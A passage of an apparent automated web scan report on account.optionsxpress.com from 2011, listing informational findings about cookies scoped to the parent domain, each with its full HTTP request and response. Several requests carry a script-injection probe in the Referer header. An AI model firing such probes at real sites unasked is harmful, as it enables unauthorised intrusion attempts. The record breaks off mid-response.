The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/styles/bubble/t.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; Firm=OX; TLTHID=08CFF1D64FFA1C27A2F8DA9B12382380

Response

HTTP/1.1 200 OK
Content-Length: 44
Content-Type: image/gif
Last-Modified: Tue, 25 May 2010 15:05:39 GMT
Accept-Ranges: bytes
ETag: "a0227ebc1bfcca1:efb"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=F7D09A6D4566E6FDAE591B92DED017AF; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:51 GMT

GIF89a...........f.!.......,...........L...;

9.29. https://account.optionsxpress.com/images/styles/bubble/tl.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/styles/bubble/tl.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/styles/bubble/tl.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; Firm=OX; TLTHID=08CFF1D64FFA1C27A2F8DA9B12382380

Response

HTTP/1.1 200 OK
Content-Length: 117
Content-Type: image/gif
Last-Modified: Tue, 25 May 2010 15:05:40 GMT
Accept-Ranges: bytes
ETag: "d0d71abd1bfcca1:fb1"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=AFEC1DFC41D58A640965F69675769361; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:50 GMT

GIF89a..........f...........y...e........d.x...2..h.........!......,.........."..I+1%.........%.#.@..fu(...1.h..F.;

9.30. https://account.optionsxpress.com/images/styles/bubble/tr.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/styles/bubble/tr.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/styles/bubble/tr.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; Firm=OX; TLTHID=08CFF1D64FFA1C27A2F8DA9B12382380

Response

HTTP/1.1 200 OK
Content-Length: 168
Content-Type: image/gif
Last-Modified: Tue, 25 May 2010 15:05:40 GMT
Accept-Ranges: bytes
ETag: "90ac1cbd1bfcca1:e6d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=9A7796FB49428C50E2B66E9C59EA7A3A; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:49 GMT

GIF89a
.......f................................x..m...........-...........f..R..b...........................!.......,....
.....% .X.#.W
..3.B. .P......0...P.%V..a ...;

9.31. https://account.optionsxpress.com/images/welcome/home/log_out.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/welcome/home/log_out.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/welcome/home/log_out.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; Firm=OX; TLTHID=6BF746C24651B1BAD934E8B86A795596; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 15335
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Firm=OX; expires=Fri, 09-Sep-2011 07:25:29 GMT; path=/
Set-Cookie: TLTHID=E6E958F44B303A4485671B976182E8E0; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:29 GMT
Vary: Accept-Encoding
Connection: Keep-Alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <titl
...[SNIP]...

9.32. https://account.optionsxpress.com/images/welcome/home/open_account_4.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/welcome/home/open_account_4.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/welcome/home/open_account_4.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; Firm=OX; TLTHID=6BF746C24651B1BAD934E8B86A795596; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Last-Modified: Wed, 18 May 2011 15:39:54 GMT
Accept-Ranges: bytes
ETag: "d7ffadd57115cc1:ef3"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=CF5297BD4EE7D9842FB52BA82A45D6B5; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:25 GMT

GIF89a.............!.......,...........D..;

9.33. https://account.optionsxpress.com/inc/general.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /inc/general.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /inc/general.js HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; Firm=OX; TLTHID=D89622F2452C5128A6EE59B41762E5D5

Response

HTTP/1.1 200 OK
Content-Length: 353785
Content-Type: application/x-javascript
Last-Modified: Tue, 31 May 2011 14:21:06 GMT
Accept-Ranges: bytes
ETag: "5ccde7fa9d1fcc1:fb9"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=6BF746C24651B1BAD934E8B86A795596; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:24 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

// SV 5/16/08 cdn_path is the url of the akamai servers. this checks to see if the cdn_path is defined on the page, and if not assignes it a value of null
try {
   if(cdn_path) {
       // do nothing
   }
...[SNIP]...

9.34. https://account.optionsxpress.com/inc/interface.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /inc/interface.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /inc/interface.js HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 60338
Content-Type: application/x-javascript
Last-Modified: Tue, 03 Aug 2010 21:34:06 GMT
Accept-Ranges: bytes
ETag: "87faba995333cb1:fb9"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=25FD2BB14273AC991AAA5EABBC316BCE; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=25FD2BB14273AC991AAA5EABBC316BCE; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:29 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

// DM - 7/29/05 **** This file contains functions mainly used by designers (open windows, manipulate GUI elements, etc.)
// Ref this file only on pages that need one of these functions.

// Globa
...[SNIP]...

9.35. https://account.optionsxpress.com/inc/js/plugins/accordion.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /inc/js/plugins/accordion.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /inc/js/plugins/accordion.js HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 9587
Content-Type: application/x-javascript
Last-Modified: Tue, 11 May 2010 17:47:22 GMT
Accept-Ranges: bytes
ETag: "c07627232f1ca1:eba"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=23A6073F461FC4644E08578F9A204196; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=23A6073F461FC4644E08578F9A204196; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:29 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

/* jQuery UI Accordion 1.7.1
*
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* http:
...[SNIP]...

9.36. https://account.optionsxpress.com/inc/js/plugins/jquery.blockUI.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /inc/js/plugins/jquery.blockUI.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /inc/js/plugins/jquery.blockUI.js HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 15677
Content-Type: application/x-javascript
Last-Modified: Mon, 10 May 2010 20:56:04 GMT
Accept-Ranges: bytes
ETag: "709b2a3483f0ca1:eb2"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=3B138D484BD3DC1EBC2548A8FD6DEEF1; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=3B138D484BD3DC1EBC2548A8FD6DEEF1; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:30 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

.../*!
* jQuery blockUI plugin
* Version 2.31 (06-JAN-2010)
* @requires jQuery v1.2.3 or later
*
* Examples at: http://malsup.com/jquery/block/
* Copyright (c) 2007-2008 M. Alsup
* Dual
...[SNIP]...

9.37. https://account.optionsxpress.com/inc/newaccount/general.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /inc/newaccount/general.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /inc/newaccount/general.js HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 75328
Content-Type: application/x-javascript
Last-Modified: Mon, 10 May 2010 20:52:59 GMT
Accept-Ranges: bytes
ETag: "f02bedc582f0ca1:eb2"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=090C09DA4E6D42932D2F21943A76C7EF; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=090C09DA4E6D42932D2F21943A76C7EF; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:29 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

/* Include general.js */
var s;
s = "<script language=\"javascript\" type=\"text/javascript\" src=\"/inc/general.js\"></script>";        
document.write(s);

/******************************************
...[SNIP]...

9.38. https://account.optionsxpress.com/inc/newaccount/jquer.ui.all.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /inc/newaccount/jquer.ui.all.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /inc/newaccount/jquer.ui.all.css HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; TLTHID=758690FA4AB663400EE3B482D991146F

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 15335
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Firm=OX; expires=Fri, 09-Sep-2011 07:25:22 GMT; path=/
Set-Cookie: TLTHID=DC968495491D236FAF80D1B2AC99C2C7; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:22 GMT
Vary: Accept-Encoding
Connection: Keep-Alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <titl
...[SNIP]...

9.39. https://account.optionsxpress.com/inc/newaccount/jquery-1.3.2.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /inc/newaccount/jquery-1.3.2.min.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /inc/newaccount/jquery-1.3.2.min.js HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 59326
Content-Type: application/x-javascript
Last-Modified: Mon, 10 May 2010 20:52:59 GMT
Accept-Ranges: bytes
ETag: "107aedc582f0ca1:efb"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=0CC03F0C431889309D8520BC90B6D7F4; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=0CC03F0C431889309D8520BC90B6D7F4; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:28 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

/*
* jQuery JavaScript Library v1.3.2
*
* Copyright (c) 2009 John Resig, http://jquery.com/
*
* Permission is hereby granted, free of charge, to any person obtaining
* a copy of this softw
...[SNIP]...

9.40. https://account.optionsxpress.com/inc/newaccount/jquery.autotab.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /inc/newaccount/jquery.autotab.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /inc/newaccount/jquery.autotab.js HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 3628
Content-Type: application/x-javascript
Last-Modified: Mon, 10 May 2010 20:53:00 GMT
Accept-Ranges: bytes
ETag: "602a83c682f0ca1:fd0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=BFE98F2847714286306A699E393BF382; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=BFE98F2847714286306A699E393BF382; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:28 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

/*
* jQuery AutoTab plugin
* http://dev.lousyllama.com/auto-tab
*
* Copyright (c) 2007 Matthew Miller
* Licensed under the MIT License:
* http://www.opensource.org/licenses/mit-license.
...[SNIP]...

9.41. https://account.optionsxpress.com/inc/newaccount/jquery.scrollTo-min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /inc/newaccount/jquery.scrollTo-min.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /inc/newaccount/jquery.scrollTo-min.js HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 2262
Content-Type: application/x-javascript
Last-Modified: Fri, 30 Apr 2010 20:54:50 GMT
Accept-Ranges: bytes
ETag: "f043f15fa7e8ca1:e6d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=CAA6523C4506CCBF77FDA49C4F49A484; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=CAA6523C4506CCBF77FDA49C4F49A484; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:28 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

/**
* jQuery.ScrollTo - Easy element scrolling using jQuery.
* Copyright (c) 2007-2009 Ariel Flesler - aflesler(at)gmail(dot)com | http://flesler.blogspot.com
* Dual licensed under MIT and GPL.
...[SNIP]...

9.42. https://account.optionsxpress.com/inc/newaccount/styles.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /inc/newaccount/styles.css

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /inc/newaccount/styles.css HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 13213
Content-Type: text/css
Last-Modified: Tue, 23 Nov 2010 16:59:49 GMT
Accept-Ranges: bytes
ETag: "f74a6d62f8bcb1:fb1"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=392D4AC8455569B192DA4CA32E2368FD; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=392D4AC8455569B192DA4CA32E2368FD; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:29 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

/*    
   Purpose:    Styles for the new account process. Shared for all sites.
   Created by: Shawn Roser
   Date:        2/9/2005
*/

/* Style Redefinitions */

/*body { background: #EBEBEB; text-align: ce
...[SNIP]...

9.43. https://account.optionsxpress.com/inc/s_code.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /inc/s_code.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /inc/s_code.js HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 40455
Content-Type: application/x-javascript
Last-Modified: Tue, 07 Jun 2011 15:21:04 GMT
Accept-Ranges: bytes
ETag: "0b0f8832625cc1:eba"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
